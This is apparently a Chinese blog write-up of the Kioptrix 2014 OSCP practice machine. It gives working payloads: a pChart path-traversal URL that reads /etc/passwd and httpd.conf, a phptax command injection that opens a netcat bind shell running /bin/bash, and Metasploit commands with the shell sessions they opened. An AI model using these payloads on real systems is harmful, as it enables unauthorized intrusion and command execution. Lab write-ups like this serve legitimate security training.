pChart 2.1.3 文件包含漏洞

  • 搜索漏洞
    OSCP-Kioptrix2014-2 漏洞利用

  • 查看漏洞理由代码:
    OSCP-Kioptrix2014-2 漏洞利用

OSCP-Kioptrix2014-2 漏洞利用

hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

OSCP-Kioptrix2014-2 漏洞利用

  • 之前的8080端口禁止访问,看看apache的配置:
http://192.168.1.78/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

OSCP-Kioptrix2014-2 漏洞利用

  • 替换User-Agent

OSCP-Kioptrix2014-2 漏洞利用

  • 所有请求都替换
    OSCP-Kioptrix2014-2 漏洞利用
    OSCP-Kioptrix2014-2 漏洞利用
    OSCP-Kioptrix2014-2 漏洞利用

phptax 远程代码执行漏洞

searchsploit phptax

OSCP-Kioptrix2014-2 漏洞利用

cat /usr/share/exploitdb/exploits/php/webapps/21665.txt

Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx; nc -l -v -p 23235 -e /bin/bash;&pdf=make
...
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc -l -v -p 23235 -e /bin/bash;&pdf=make

  • 查看ip
    OSCP-Kioptrix2014-2 漏洞利用

OSCP-Kioptrix2014-2 漏洞利用

  • 使用msf
    OSCP-Kioptrix2014-2 漏洞利用
search phptax

use exploit/multi/http/phptax_exec

show options 

set RHOSTS 192.168.1.78

set RPORT 8080

exploit

[] Reading from socket B
[
] B: "Nb3RvqsTnHYDLGF1\r\n"
[] Matching...
[
] A is input...
[] B: "ZH6YCocW8zgCjI5i\r\n"
[
] Matching...
[] A is input...
[
] Command shell session 1 opened (192.168.1.251:4444 -> 192.168.1.78:14913) at 2019-06-28 14:50:46 +0800
[*] Command shell session 2 opened (192.168.1.251:4444 -> 192.168.1.78:46043) at 2019-06-28 14:50:46 +0800

相关文章:

  • 2021-08-02
  • 2021-12-21
  • 2021-10-24
  • 2021-08-10
  • 2021-08-10
  • 2021-06-17
  • 2021-09-09
猜你喜欢
  • 2021-09-25
  • 2021-09-16
  • 2021-11-23
  • 2021-12-22
  • 2021-10-16
  • 2021-06-14
  • 2021-10-22
相关资源
相似解决方案